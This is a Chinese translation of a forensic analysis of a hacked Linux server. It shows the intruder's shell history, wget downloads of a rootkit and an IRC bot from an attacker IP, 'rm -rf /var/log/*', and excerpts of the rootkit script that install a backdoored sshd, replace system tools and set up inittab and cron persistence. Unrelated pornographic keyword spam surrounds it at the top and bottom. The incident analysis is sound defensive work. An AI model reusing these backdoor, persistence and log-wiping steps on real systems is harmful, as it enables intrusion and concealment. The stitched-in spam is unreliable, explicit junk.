精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

一次服務器被入侵后的分析

運維 系統運維
最近有個朋友讓我去幫他看一下他的Linux服務器,說是apache啟動不了,有很多詭異的情況。后來證明絕不是apache啟動不了這么簡單。本文將這次服務器被入侵后的分析整理出來,和大家分享一下。

最近有個朋友讓我去幫他看一下他的Linux服務器,說是Apache啟動不了,有很多詭異的情況。后來證明絕不是Apache啟動不了這么簡單。

登上服務器之后隨便看了下,最先引起我注意的是”ls”命令的輸出:

 

  1. lars@server1:~$ ls 
  2.   ls: invalid option -- h 
  3.   Try `ls --help' for more information. 

 

為什么”ls”默認加了”-h”參數呢?我用”alias”命令看了一下,然后取消了這個別名之后”ls”就工作正常了。

  1. lars@server1:~$ alias ls 
  2.   alias ls='ls -sh --color=auto' 
  3.   lars@server1:~$ unalias ls 
  4.   lars@server1:~$ ls 
  5.   backup 
  6.   lars@server1:~$ 

 

雖然很奇怪,不過我的首要任務是先把apache啟動起來,等過會再仔細研究這個問題。

  1. lars@server1:~$ sudo /etc/init.d/apache2 start 
  2.   Password: 
  3.    * Starting apache 2.0 web server... 
  4.   (2): apache2: could not open error log file /var/log/apache2/error.log. 
  5.   Unable to open logs 
  6.    ...fail! 

 

納尼?趕緊去”/var/log/”目錄一看,果然”apache2/”文件夾不見了.而且這個目錄下其他的文件夾,比如”mysql/”,”samba/”也都不見了.一定是哪里出錯了.會不會是我朋友不小心刪掉了呢,他跟我說絕對沒有.然后我用root登錄進去準備修復日志丟失的問題。

  1. lars@server1:~$ sudo -i 
  2.    Password: 
  3.    root@server1:~# ls 
  4.    ls: unrecognized prefix: do 
  5.    ls: unparsable value for LS_COLORS environment variable 
  6.    total 44 
  7.      4 .                 4 .bashrc           4 .ssh 
  8.      4 ..                4 .lesshst          8 .viminfo 
  9.      8 .bash_history     4 .profile          4 .vimrc 

 

很不幸的發現,”ls”又出問題了.同樣,用”alias”命令:

  1. root@server1:~# alias ls 
  2.    alias ls='ls -sa --color=auto' 
  3.    root@server1:~# unalias ls 
  4.    root@server1:~# ls 
  5.    root@server1:~# 

 

這個時候,我才意識到問題的嚴重性.”ls”奇怪的舉動和”/var/log/”大量日志被刪除讓我懷疑服務器是否被入侵了.當我看到root目錄下的”.bash_history”時,就已經可以確定被入侵了。

  1. root@server1:~# cat -n .bash_history 
  2.    ... 
  3.    340  w 
  4.    341  cd /var 
  5.    342  wget http://83.19.148.250/~matys/pliki/shv5.tar.gz 
  6.    343  tar -zxf shv5.tar.gz 
  7.    344  rm -rf shv5.tar.gz 
  8.    345  mv shv5 .x 
  9.    346  cd .x 
  10.    347  ./setup zibi.joe.149 54098 
  11.    348  passwd 
  12.    349  passwd 
  13.    350  ps aux 
  14.    351  crontab -l 
  15.    352  cat /etc/issue 
  16.    353  cat /etc/passwd 
  17.    354  w 
  18.    355  who 
  19.    356  cd /usr/lib/libsh 
  20.    357  ls 
  21.    358  hide + 
  22.    359  chmod +x hide 
  23.    360  hide + 
  24.    361  ./hide + 
  25.    362  cd /var/.x 
  26.    363  mkdir psotnic 
  27.    364  cd psotnic 
  28.    365  wget http://83.19.148.250/~matys/pliki/psotnic0.2.5.tar.gz 
  29.    366  tar -zxf psotnic0.2.5.tar.gz 
  30.    367  rm -rf psotnic0.2.5.tar.gz 
  31.    368  ls 
  32.    369  mv psotnic-0.2.5-linux-static-ipv6 synscan 
  33.    370  ./synscan 
  34.    371  vi conf 
  35.    372  vi conf1 
  36.    373  mv synscan smbd 
  37.    374  smbd -c conf 
  38.    375  ls 
  39.    376  ps aux 
  40.    377  ls 
  41.    378  ./smbd -c conf 
  42.    379  ./smbd -c conf1 
  43.    380  ./smbd conf 
  44.    381  ./smbd conf1 
  45.    382  ./smbd -a conf conf1 
  46.    383  rm -rf conf.dec 
  47.    384  rm -rf conf1.dec 
  48.    385  cd /usr/lib/libsh 
  49.    386  ./hide + 
  50.    387  exit 
  51.    ... 
  52.    425  ssh ftp@62.101.251.166 
  53.    426  w 
  54.    427  ls 
  55.    428  ls 
  56.    429  cd /var/.x 
  57.    430  ls 
  58.    431  cd psotnic/ 
  59.    432  ls 
  60.    433  rm -rf /var/log/* 
  61.    434  exit 
  62.    435  ls 
  63.    436  cd /var/.x/psotnic/ 
  64.    437  ls 
  65.    438  vi conf2 
  66.    439  ./smbd -c conf2 
  67.    440  ./smbd conf2 
  68.    441  ./smbd -a conf conf1 conf2 
  69.    442  rm -rf conf2.dec 
  70.    443  cd .. 
  71.    444  ls 
  72.    445  cd /usr/lib/libsh 
  73.    446  hide + 
  74.    447  ./hide + 
  75.    448  exit 
  76.    449  ps aux 
  77.    450  cd /var/.x 
  78.    451  ls 
  79.    452  ls 
  80.    453  cd psotnic/ 
  81.    454  ls 
  82.    455  cat pid.MastaH 
  83.    456  kill -9 2030 
  84.    457  ./synscan -a conf conf1 
  85.    458  ./smbd -a conf conf1 
  86.    459  cd /usr/lib/libsh 
  87.    460  ./hide + 

 

這個系統已經被入侵了.這實在是令人激動的一件事情,不過很顯然,我的朋友不這么想.這個入侵者犯了一個很基本的錯誤,沒有清除”.bash_history”文件.所以他/她可能在其他的地方也留下了一些蛛絲馬跡.接下來就是詳細的分析一下這次入侵。#p#

通過bash history我們得到了大量的信息.先來看一下”/var/.x”下面隱藏了什么和命令”setup zibi.joe.149 54098″的作用吧。

  1. root@server1:/var/.x# file setup 
  2.   setup: Bourne-Again shell script text executable 
  3.   root@server1:/var/.x# wc -l setup 
  4.   825 setup 
  5.   root@server1:/var/.x# head -17 setup 
  6.   #!/bin/bash 
  7.   # 
  8.   # shv5-internal-release 
  9.   # by: PinT[x] April/2003 
  10.   # 
  11.   # greetz to: 
  12.   # 
  13.   # [*] SH-members: BeSo_M, grass^, toolman, nobody, niceboy, armando99 
  14.   #                 C00L|0, GolDenLord, Spike, zion ... 
  15.   # [*] Alba-Hack : 2Cool, heka, TheMind, ex-THG members ... 
  16.   # [*] SH-friends: mave, AlexTG, Cat|x, klex, JinkS ... 
  17.   # [*] tC-members: eksol, termid, hex, keyhook, maher, tripod etc.. 
  18.   # [*] And all others who diserve to be here but i forgot 
  19.   # [*] them at the moment ! 
  20.   # 
  21.   # PRIVATE ! DO NOT DISTRIBUTE *censored*EZ ! 

 

“setup”這個腳本是rootkit shv5的安裝腳本.它安裝了一個修改過的ssh后門–”/bin/ttyload”,然后把它加到了”/etc/inittab”,這樣每次重啟后就會自動啟動.(相關部分的腳本如下:)

  1. mv $SSHDIR/sshd /sbin/ttyload 
  2.    chmod a+xr /sbin/ttyload 
  3.    chmod o-w /sbin/ttyload 
  4.    touch -acmr /bin/ls /sbin/ttyload 
  5.    chattr +isa /sbin/ttyload 
  6.    kill -9 `pidof ttyload` >/dev/null 2>&1 
  7.    .... 
  8.    # INITTAB SHUFFLING 
  9.    chattr -isa /etc/inittab 
  10.    cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1 
  11.    cat /etc/inittab |grep getty > /tmp/.init2 
  12.    echo "# Loading standard ttys" >> /tmp/.init1 
  13.    echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1 

 

它也替換了一些linux的標準命令。

  1. # Backdoor ps/top/du/ls/netstat/etc.. 
  2.    cd $BASEDIR/bin 
  3.    BACKUP=/usr/lib/libsh/.backup 
  4.    mkdir $BACKUP 
  5.    ... 
  6.    # ls ... 
  7.    chattr -isa /bin/ls 
  8.    cp /bin/ls $BACKUP 
  9.    mv -f ls /bin/ls 
  10.    chattr +isa /bin/ls 

 

這樣子就可以解釋為什么”ls”命令輸出那么奇怪了。

“.backup”文件夾保存了被替換之前的命令程序。

  1. root@server1:/var/.x# ls -l /usr/lib/libsh/.backup/ 
  2.   total 552 
  3.   -rwxr-xr-x   1 root     root       126276 Dec 24 22:58 find 
  4.   -rwxr-xr-x   1 root     root        59012 Dec 24 22:58 ifconfig 
  5.   -rwxr-xr-x   1 root     root        77832 Dec 24 22:58 ls 
  6.   -rwxr-xr-x   1 root     root        30388 Dec 24 22:58 md5sum 
  7.   -rwxr-xr-x   1 root     root        99456 Dec 24 22:58 netstat 
  8.   -rwxr-xr-x   1 root     root        65492 Dec 24 22:58 ps 
  9.   -rwxr-xr-x   1 root     root        14016 Dec 24 22:58 pstree 
  10.   -rwxr-xr-x   1 root     root        50180 Dec 24 22:58 top 

 

看了一下時間戳,居然是在圣誕節。

很顯然,原始的”ls”和后門安裝的”ls”是不一樣的.他們的md5對比如下:

 

  1. root@server1:~# md5sum /usr/lib/libsh/.backup/ls /bin/ls 
  2. eef7ca9dd6be1cc53bac84012f8d1675  /usr/lib/libsh/.backup/ls 
  3. 0a07cf554c1a74ad974416f60916b78d  /bin/ls 
  4.   
  5. root@server1:~# file /bin/ls 
  6. /bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked 
  7. (uses shared libs), for GNU/Linux 2.0.0, stripped 
  8.   
  9. root@server1:~# file /usr/lib/libsh/.backup/ls 
  10. /usr/lib/libsh/.backup/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked 
  11. (uses shared libs), for GNU/Linux 2.6.0, stripped 

這個rootkit(“sh5.tar.gz”)是從下面的地址下載的。

  1. root@server1:~# dig +short -x 83.19.148.250 
  2.    4lo.bydg.pl. 

 

這是一個波蘭的ip,從這個ip上沒有得到更多的信息.不過這個入侵者依然犯了幾個嚴重的錯誤.

這是運行”setup”命令的截圖:(在服務器上的沙盒里運行的)

rq1

所以”zibi.joe.149″是后門的密碼,”54098″是端口號.這是一個來自ssh.com的就版本的sshd.測試截圖如下:

rq2

安裝完后門之后,下一個步驟就是裝一個irc-bot,讓服務器變成僵尸網絡中的一員.”psotnic0.2.5.tar.gz”就是來達到這個目的的.入侵者解壓這個包之后把 irc-bot重命名為”smbd”,來達到隱藏的目的。

然后,他創建了兩個配置文件.文件中包含irc服務器和需要加入的頻道.配置文件是加密過的,而且明文的配置文件被刪掉了。

 

  1. vi conf 
  2. vi conf1 
  3. .... 
  4. ./smbd -c conf 
  5. ./smbd -c conf1 
  6. ./smbd conf 
  7. ./smbd conf1 
  8. ./smbd -a conf conf1 

 

讓我們執行一下382這條命令,看看會發生什么。

  1. root@server1:/var/.x/psotnic# ./smbd -a conf conf1 
  2.    Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) 
  3.    Copyright (C) 2003-2005 Grzegorz Rusin 
  4.    [+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 
  5.    [+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1 
  6.    [+] Added 2 psotnics to cron 

 

哇!它添加了cron定時任務.趕緊看一看:

 

  1. root@server1:/var/.x/psotnic# crontab -l 
  2.    */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 
  3.    */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1 

 

#p#

接下來,我殺掉這兩個惡意的smbd進程,禁用cron任務.在另一個shell中運行了tcpdump,然后手動啟動了這兩個irc-bot進程:

  1. root@server1:~# cd /var/.x/psotnic; ./smbd conf 
  2.   
  3.    Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) 
  4.    Copyright (C) 2003-2005 Grzegorz Rusin 
  5.   
  6.    [*] Acting as LEAF 
  7.    [+] Config loaded 
  8.    [+] Going into background [pid: 5724] 
  9.    root@server1:/var/.x/psotnic# ./smbd conf1 
  10.   
  11.    Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) 
  12.    Copyright (C) 2003-2005 Grzegorz Rusin 
  13.   
  14.    [*] Acting as LEAF 
  15.    [+] Config loaded 
  16.    [+] Going into background [pid: 5727] 
  17.    root@server1:/var/.x/psotnic# 

 

用”ps”命令(后門替換過的)可以看到這兩個進程.這也是為什么入侵者需要通過改名字來隱藏進程。

  1. root@server1:/var/.x/psotnic# ps axuw | grep smb 
  2.    root      3799  0.0  0.4  8592 2156 ?        S    11:00   0:00 /usr/sbin/smbd -D 
  3.    root      3808  0.0  0.1  8592  896 ?        S    11:00   0:00 /usr/sbin/smbd -D 
  4.    root      5724  0.0  0.1  1648  772 pts/2    S    12:47   0:00 ./smbd conf 
  5.    root      5727  0.0  0.1  1640  764 pts/2    S    12:47   0:00 ./smbd conf1 

 

最開始兩個是真正的samba進程,后面兩個是irc-bot,讓我們用”strace”命令來看看它做了什么:

 

  1. root@server1:~# strace -p 5727 
  2.    ... 
  3.    connect(3, {sa_family=AF_INETsin_port=htons(9714), sin_addr=inet_addr("83.18.74.235")}, 16) = -1 EINPROGRESS (Operation now in progress) 
  4.    ... 
  5.    connect(4, {sa_family=AF_INETsin_port=htons(6667), sin_addr=inet_addr("195.159.0.92")}, 16) = -1 EINPROGRESS (Operation now in progress) 

 

可以看到它嘗試連接ip 83.18.74.235的9714端口和195.159.0.92的6667端口:

  1. root@server1:~# dig +short -x 83.18.74.235 
  2.    manhattan.na.pl. 
  3.    root@server1:~# dig +short -x 195.159.0.92 
  4.    ircnet.irc.powertech.no. 

 

又是一個波蘭的ip.另外一個ip,”ircnet.irc.powertech.no”是”irc.powertech.nof”的別名.是挪威一個著名的irc服務器。

tcpdump抓到了連接irc服務器的流量.正如下面的內容顯示,它連接到了”irc.powertech.no”,加入了”#aik”頻道。

 

 

  1. :irc.powertech.no 001 578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB!~op@ti231210a080-3666.bb.online.no 
  2.     :irc.powertech.no 002 578PAB9NB :Your host is irc.powertech.no, running version 2.11.1p1 
  3.   
  4.     :578PAB9NB!~op@ti231210a080-3666.bb.online.no JOIN :#aik 
  5.     :irc.powertech.no 353 578PAB9NB @ #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo 
  6.     :irc.powertech.no 366 578PAB9NB #aik :End of NAMES list. 
  7.     :irc.powertech.no 352 578PAB9NB #aik ~op ti231210a080-3666.bb.online.no irc.powertech.no 578PAB9NB G :0 op - GTW 
  8.     :irc.powertech.no 352 578PAB9NB #aik ~kknd ti231210a080-3666.bb.online.no irc.hitos.no kknd H :2 kknd - GTW 
  9.     :irc.powertech.no 352 578PAB9NB #aik ~raider mobitech-70.max-bc.spb.ru *.dotsrc.org raider G :4 raider - GTW 
  10.     :irc.powertech.no 352 578PAB9NB #aik ~brandyz mobitech-70.max-bc.spb.ru *.dotsrc.org brandyz G :4 brandyz - GTW 
  11.     :irc.powertech.no 352 578PAB9NB #aik ~jpi p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp jpi G :8 jpi - GTW 
  12.     :irc.powertech.no 352 578PAB9NB #aik ~conf p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp conf G :7 conf - GTW 
  13.     :irc.powertech.no 352 578PAB9NB #aik ~xerkoz p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp xerkoz H :7 xerkoz - GTW 
  14.     :irc.powertech.no 352 578PAB9NB #aik lm campus19.panorama.sth.ac.at *.at IpaL H :5 .LaPi.9@.IRCNet.. 
  15.     :irc.powertech.no 352 578PAB9NB #aik ~vvo ppp86-7.intelcom.sm *.tiscali.it vvo H :6 vvo - GTW 
  16.     :irc.powertech.no 315 578PAB9NB #aik :End of WHO list. 
  17.   
  18. 這些僅僅是加入#aik頻道,并開始監聽該頻道所有成員的一些原始網絡流量.我決定自己進入這個頻道看看.令我驚訝的是不需要任何密碼我就進來了. 
  19.   
  20.     17:43 -!- viper42 [~viper42@trinity.gnist.org] has joined #aik 
  21.     17:43 [Users #aik] 
  22.     17:43 [ 578PAB9NL] [ conf] [ jpi ] [ raider ] [ vvo   ] 
  23.     17:43 [ brandyz  ] [ IpaL] [ kknd] [ viper42] [ xerkoz] 
  24.     17:43 -!- Irssi: #aik: Total of 10 nicks [0 ops, 0 halfops, 0 voices, 10 normal] 
  25.     17:43 -!- Irssi: Join to #aik was synced in 1 secs 

 

 

我發現我朋友的服務器使用的昵稱是”578PQB9NB”,還有一些其他的服務器也在這里.這些僵尸服務器應該是正在等待著我們的入侵者加入頻道發布命令.或者他已經潛藏在這里了.我注意到,所有的昵稱都有一個后綴”\*-GTW”,只有一個沒有:

  1. 17:45 [powertech] -!- IpaL [lm@campus19.panorama.sth.ac.at] 
  2. 17:45 [powertech] -!-  ircname  : LaPi@IRCNet 
  3. 17:45 [powertech] -!-  channels : #relaks #ping @#seks #aik @#ogame.pl 
  4.    #pingwinaria #hattrick #trade #admin @#!sh 
  5.    17:45 [powertech] -!-  server   : *.at [\o\  \o/  /o/] 

 

這是唯一一個加入了多個頻道的昵稱.我猜我已經找到這個入侵者了,除非這是一個故意迷惑的誘餌.(恩,這個入侵者真的真么笨!!這么容易就找到了!?).我決定等幾天看看有木有什么有趣的事情發生.這個域名解析到了:

  1. $ dig +short campus19.panorama.sth.ac.at 
  2.    193.170.51.84 

 

根據RIPE的數據,這個ip屬于Vienna University計算機中心,我發了一封郵件詢問關于這個域名的信息,他們幾個小時后會我了:

 

  1. From: Alexander Talos via RT 
  2.    To: larstra@ifi.uio.no 
  3.    Subject: Cracker at campus19.panorama.sth.ac.at (193.170.51.84)  [ACOnet CERT #38603] 
  4.    Date: Fri, 18 May 2007 18:22:43 +0200 (CEST) 
  5.    Reply-To: cert@aco.net 
  6.   
  7.    -----BEGIN PGP SIGNED MESSAGE----- 
  8.    Hash: SHA1 
  9.   
  10.    Hej! 
  11.   
  12.    On Fri May 18 14:45:03 2007, larstra@ifi.uio.no wrote: 
  13.   
  14.    > I have been tracking down cracker which connected from 
  15.    > campus19.panorama.sth.ac.at (193.170.51.84). The user, which 
  16.   
  17.    Ouch. panorama.sth.ac.at is a dormitory with about 4k rooms all 
  18.    behind a NAT gateway - it will be very hard to get hold of the 
  19.    miscreant. 
  20.   
  21.    This incident will, in the long run, definitely help me getting 
  22.    rid of the NAT boxes in setups like that, but right now, we will 
  23.    have to make do with what we have. 
  24.   
  25.    > Please investigate the host in question. Perhaps is this a 
  26.    > compromised host on your network acting as a jumpstation for 
  27.   
  28.    Sure, and even in a NATed environment, this is still possible. 
  29.   
  30.    Btw, you did a great job in analysing the compromised machine! 
  31.   
  32.    I'll let you know when I have either further questions or any 
  33.    interesting results. 
  34.   
  35.    Cheers, 
  36.   
  37.    Alexander Talos 
  38.   
  39.    - -- 
  40.    IT-Security, Universitaet Wien, ACOnet CERT 
  41.   
  42.    T: +43-1-4277-14351  M: +43-664-60277-14351 
 

 

看起來我不夠幸運。#p#

接下來我曾嘗試連接irc頻道里其他僵尸主機的 54098端口,可惜都失敗了.看來其他的僵尸主機的后門可能使用的是別的端口。

連接到”83.18.74.235″的流量看起來很混亂.只好再次用strace命令:

 

  1. root@server1:/var/.x/psotnic# strace -f ./smbd conf1 &> /root/dump.strace 

 

跟預期的一樣,有很多輸出,其中一個是它嘗試啟動”BitchX”,這是一個irc客戶端.但是失敗了,因為BitchX沒有安裝:

  1. [pid  7537] write(2, "sh: ", 4)         = 4 
  2.    [pid  7537] write(2, "BitchX: not found", 17) = 17 
  3.    [pid  7537] write(2, "n", 1)           = 1 
  4.    [pid  7537] close(2)                    = 0 

 

下面的截圖是tcpdump抓到流量的一部分:

rq3

這僅僅是兩個假的smbd進程中的一個.另外一個也連到了兩個irc服務器,一個是波蘭這個,另外一個是”irc.hitos.no”,位于挪威的特羅姆斯郡。

入侵者除了這些,還運行了一個叫”hide”的腳本來清除日志:

  1. root@server1:/usr/lib/libsh# ./hide + 
  2.    Linux Hider v2.0 by mave 
  3.    enhanced by me! 
  4.    [+] [Shkupi Logcleaner] Removing + from the logs........ . 
  5.   
  6.    [+] /var/log/messages  ... [done] 
  7.   
  8.    [+] /var/run/utmp      ... [done] 
  9.   
  10.    [+] /var/log/lastlog   ... [done] 
  11.   
  12.    [+] /var/log/wtmp      ... [done] 
  13.   
  14.    * m i s s i o n  a c c o m p l i s h e d * 
  15.   
  16.    p.h.e.e.r  S.H.c.r.e.w 

 

那么這個入侵者為什么還要把”/var/log/”目錄全刪除了呢,是不相信這個工具么?還是他特別害怕?

可以看到這個服務器被入侵了,安裝了后門而且加入了僵尸網咯.但是入侵者犯了幾個錯誤導致他可能被偵查到:

1、忘記清除”.bash_history”文件

2、“/var/log”目錄下所有文件都刪除了.導致某些程序無法啟動.很容易被發現.

3、修改了root的密碼.又是一個愚蠢的行為.永遠不要修改root密碼,這個必然會引起管理員的注意.

4、irc的頻道沒有密碼保護.雖然即使有密碼,我們也可以抓包分析出來.

5、入侵者平時就在僵尸網絡的頻道閑逛?如果是這樣的話那他已經暴露了.

當然還有幾個遺留的問題:

1、”ssh ftp@62.101.251.166″ 這個命令是干嘛的.是入侵者不小心敲錯了么還是有其他的目的?

 

  1. $ dig +short -x 62.101.251.166 
  2.      cA6FB653E.dhcp.bluecom.no. 

 

2、跟83.18.74.235(manhattan.na.pl)的通訊內容是什么?

3、最重要的問題是他一開始是如何或得下系統的權限的?這個服務器運行的是Ubuntu 6.06 LTS,打了最新的補丁。可能入侵的途徑:

*猜測root密碼,不幸的是這個密碼是強密碼*

*未知的exploit*

*某個用戶在已經被攻陷的主機上登錄這臺服務器.入侵者嗅探到了密碼.*

原文出處: lars strand   譯文出處: freebuf

【編輯推薦】

 

  1. 六種Linux桌面的最佳特性和最差特性
  2. Linux系統監控知識分享
  3. 如何在Linux桌面或Mac上運行Windows應用程序?
  4. Linux 環境下快速部署 MySQL 的替代方案
  5. 高效Linux用戶需要了解的命令行技能
  6. 如何找到一款適合自己的Linux發行版?

 

【責任編輯:黃丹 TEL:(010)68476606】

責任編輯:黃丹 來源: jobbole.com
相關推薦

2013-12-24 13:59:03

2022-02-17 11:19:33

Kubernetes服務器運維

2022-09-14 12:01:35

服務器入侵篡改,

2016-09-08 22:54:14

2013-12-23 09:38:11

2019-08-01 15:05:22

2009-10-22 13:18:03

2019-06-11 09:23:38

2017-10-18 09:06:41

2011-03-04 12:33:16

2022-10-25 08:56:16

2010-04-28 17:14:52

Google服務器

2018-05-30 11:09:41

memcache服務器故障

2019-06-10 15:20:18

2014-08-29 09:09:33

2019-10-25 22:06:38

服務器開發工具

2017-12-06 19:00:53

2020-03-22 15:17:17

服務器科技芯片

2018-03-02 10:42:44

服務器數據備份

2014-08-01 14:06:45

點贊
收藏

51CTO技術棧公眾號

欧美激情va永久在线播放| 日本韩国欧美一区二区三区| 国产精品swag| 亚洲影院在线播放| 日韩欧美一区二区三区免费看| 欧美日韩中文一区| 免费视频爱爱太爽了| 毛片在线免费| 国产精品88888| 日韩美女福利视频| 欧美特级一级片| 曰本一区二区三区视频| 在线播放欧美女士性生活| 五月丁香综合缴情六月小说| 1区2区3区在线观看| 成人av资源网站| 成人性生交xxxxx网站| 国产精品久久久久久久妇| 99久久婷婷国产综合精品电影√| 亚洲国产91精品在线观看| 国产九九热视频| 美女av在线免费看| 一区二区三区四区不卡在线 | 亚洲精品无码专区| 日本欧美大码aⅴ在线播放| 欧美激情在线观看| 黑人狂躁日本娇小| 禁断一区二区三区在线| 亚洲激情在线观看| 欧美日韩一区二区区| 国外成人福利视频| 色综合久久综合中文综合网| 僵尸世界大战2 在线播放| 哥也色在线视频| 国产精品久久久久一区二区三区| 免费国产一区二区| 日韩一级片免费观看| 国产精品911| 91系列在线观看| 亚洲天堂中文在线| 日韩国产精品91| 日本高清不卡在线| 久久人妻免费视频| 亚洲一区欧美激情| 91精品国产91久久| www.伊人久久| 亚洲少妇一区| 91成人在线播放| 偷偷操不一样的久久| 久久久久亚洲| 超碰91人人草人人干| 亚洲aaa视频| 99精品在线免费在线观看| 中文字幕日韩精品有码视频| www久久久久久久| 成人无号精品一区二区三区| 国产亚洲视频在线观看| 小早川怜子久久精品中文字幕| 亚洲精品无吗| 亚洲人av在线影院| www.99热| 天堂美国久久| 欧美大片在线影院| 精品人妻在线播放| 亚洲激情二区| 日韩美女福利视频| 91丨porny丨在线中文 | 一本色道久久综合亚洲| 美日韩一级片在线观看| 91影院在线免费观看视频| 国产手机精品视频| 不卡高清视频专区| 欧美高清一区二区| 久久精品视频观看| 亚洲午夜一区二区三区| 日韩a∨精品日韩在线观看| 在线最新版中文在线| 欧美视频在线一区| 日本少妇一区二区三区| 欧美美女啪啪| 国产一区二区三区视频在线观看 | 国产精品久久视频| 国产精品国产一区二区三区四区 | 国产精品久久久久久久小唯西川 | 91老师片黄在线观看| 清纯唯美一区二区三区| 美女羞羞视频在线观看| 亚洲高清视频中文字幕| 国产又大又硬又粗| 高清在线一区二区| 日韩精品在线观看网站| 黄色一级片一级片| 亚洲国产二区| 国产精品自拍视频| 日韩在线视频免费| 国产精品免费aⅴ片在线观看| 青青视频免费在线观看| 依依综合在线| 日韩一区二区精品| a毛片毛片av永久免费| 午夜激情久久| 人人爽久久涩噜噜噜网站| 在线观看国产精品视频| av亚洲精华国产精华精| 一区二区不卡在线视频 午夜欧美不卡' | 一级黄色av片| 国产91综合网| 青娱乐国产91| 深夜福利视频一区二区| 91精品啪在线观看国产60岁| 亚洲熟妇一区二区三区| 中文不卡在线| 国产精品青青在线观看爽香蕉 | 日韩中文字幕视频网| 亚洲人成五月天| 国产精品第72页| 极品美女销魂一区二区三区免费| 欧美一级日本a级v片| 丰乳肥臀在线| 91精品免费在线观看| 国产1区2区在线观看| 一区二区91| 国产美女在线精品免费观看| 激情在线小视频| 欧美综合一区二区三区| 亚洲精品乱码久久久久久不卡| 亚洲欧美网站在线观看| 国产精品男人的天堂| 日韩av资源站| 欧美日韩国产综合新一区| 免费欧美一级片| 欧美一区二区| 91天堂在线视频| 国产盗摄在线观看| 欧美一区二区在线免费播放| 亚洲精品自拍视频在线观看| 视频一区视频二区在线观看| 久久久com| 深夜av在线| 亚洲精品视频免费| 天天干天天干天天干天天| 成人午夜视频在线| 成人精品视频在线播放| av日韩精品| 久久久久中文字幕| 你懂的网站在线| 午夜伦欧美伦电影理论片| 无码人妻精品一区二区三| 欧美成熟视频| 91传媒视频免费| 肉体视频在线| 亚洲成人中文字幕| 国产乡下妇女做爰视频| 不卡的看片网站| 鲁一鲁一鲁一鲁一澡| 婷婷精品视频| 国产精品白嫩初高中害羞小美女| 国产女主播在线直播| 在线观看日韩av先锋影音电影院| 成年人在线免费看片| 免费人成精品欧美精品| 中文字幕日韩精品久久| 日本少妇精品亚洲第一区| 欧美激情在线播放| 青草久久伊人| 欧美视频一区二区| 精品国产精品国产精品| 国产99久久久精品| 国产在线青青草| 成人免费在线观看av| 91色精品视频在线| bl视频在线免费观看| 亚洲午夜色婷婷在线| 国产精品探花视频| 亚洲不卡一区二区三区| 午夜时刻免费入口| 国模大尺度一区二区三区| 国产色一区二区三区| 少妇精品久久久| 91香蕉亚洲精品| 国产高清自产拍av在线| 国产亚洲xxx| 精品久久久久中文慕人妻| 亚洲成a人片在线不卡一二三区| 免费看黄色aaaaaa 片| 秋霞电影一区二区| 国产情侣第一页| 国产一区二区三区四区二区| 91理论片午午论夜理片久久| 欧美a级在线观看| 日韩中文字幕在线看| 日本激情视频网站| 欧美日韩欧美一区二区| 伊人365影院| 中文乱码免费一区二区| 国产一精品一aⅴ一免费| 日日夜夜精品视频免费| www国产免费| re久久精品视频| 国产伦精品一区二区三区免 | 欧美三区在线观看| 午夜偷拍福利视频| 亚洲欧洲日本在线| 中文字幕免费看| 国产jizzjizz一区二区| 三上悠亚av一区二区三区| 亚洲美女少妇无套啪啪呻吟| 一区国产精品| 精品在线手机视频| 国产美女99p| 亚洲在线资源| 国产成人免费91av在线| 免费看电影在线| 日韩视频精品在线| 国产有码在线| 亚洲精品国产精品自产a区红杏吧| 国产精品主播一区二区| 欧洲一区二区av| 久久久久久久久久免费视频| 亚洲免费观看视频| 三级黄色片在线观看| 国产人成一区二区三区影院| 波多野结衣影院| 成人永久aaa| 美女被艹视频网站| 麻豆久久一区二区| www黄色在线| 欧美亚洲免费| 每日在线更新av| 亚洲精品裸体| 日韩av新片网| 亚洲日韩成人| 久久精品国产sm调教网站演员| 一本精品一区二区三区| 中文字幕精品—区二区日日骚| 不卡日本视频| 亚洲精品日韩精品| 欧美艳星介绍134位艳星| 日本成人三级电影网站| 中文字幕伦av一区二区邻居| 蜜桃狠狠色伊人亚洲综合网站| 四虎5151久久欧美毛片| 麻豆精品视频| 国产一区二区精品福利地址| 欧美激情第一页在线观看| 色狠狠久久av综合| 麻豆精品传媒视频| 欧美人与牛zoz0性行为| 亚洲国产婷婷香蕉久久久久久99| 国产永久精品大片wwwapp| 日韩偷拍一区二区| 日韩精品永久网址| 懂色av一区二区三区四区五区| 午夜精品视频一区二区三区在线看| 亚洲免费av网| 欧美jjzz| 日韩中字在线观看| 免费一级欧美片在线播放| 久久精品午夜福利| 免费高清成人在线| 超碰中文字幕在线观看| 国产91丝袜在线播放九色| 精品一区二区三区四区五区六区| 福利电影一区二区三区| 亚洲精品乱码久久久久久久| 久久精品这里都是精品| 日本一区二区视频在线播放| 国产精品美女久久久久久2018| 国产老头老太做爰视频| 亚洲一区二区三区美女| 毛片毛片女人毛片毛片| 欧美丝袜丝交足nylons| 精品国自产在线观看| 亚洲精品电影在线| 国产高清一区在线观看| 日韩视频在线一区| sm在线观看| 日韩美女写真福利在线观看| 国产第一亚洲| 国产精品免费一区二区三区| 自拍自偷一区二区三区| 亚洲一区二区三区涩| 亚洲午夜黄色| the porn av| 成人av影院在线| 国产又粗又猛又爽又黄的视频小说| 亚洲卡通欧美制服中文| 天码人妻一区二区三区在线看| 欧美日韩电影在线播放| 